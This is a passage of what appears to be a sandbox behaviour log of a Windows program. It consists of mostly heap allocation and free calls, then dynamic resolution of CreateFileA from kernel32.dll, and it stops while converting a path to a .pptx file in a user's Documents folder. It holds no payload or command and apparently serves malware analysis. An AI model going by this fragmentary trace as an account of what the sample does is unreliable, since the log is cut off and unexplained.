hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.537] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.537] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.537] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.537] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.538] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.541] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.543] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.543] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.543] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbc8 [0036.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbc8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.544] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0036.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cbc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.544] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.544] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.544] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0036.544] 